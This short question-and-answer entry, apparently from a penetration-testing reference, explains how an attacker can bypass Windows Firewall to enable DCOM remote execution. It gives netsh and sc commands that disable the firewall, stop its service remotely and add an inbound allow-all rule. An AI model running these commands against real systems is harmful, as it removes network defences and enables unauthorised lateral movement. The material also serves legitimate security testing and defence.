How can an attacker bypass the Windows Firewall to enable DCOM remote execution?
Attackers can disable the firewall entirely via `netsh advfirewall set currentprofile state off` or remotely stop the firewall service using `sc \\target stop mpssvc`. Alternatively, they can create inbound rules allowing any port (`netsh advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow`) or change the firewall profile to allow all inbound connections. Remote firewall modification requires enabling remote management via `netsh advfirewall set currentprofile settings remotemanagement enable` and then using `netsh -r target -u user -p pass ...`. These techniques are often combined with stealthy methods described in Penetration Techniques - Stealth Execution of Windows Remote Assistance.
Windows Firewall, netsh, firewall bypass, remote management, DCOM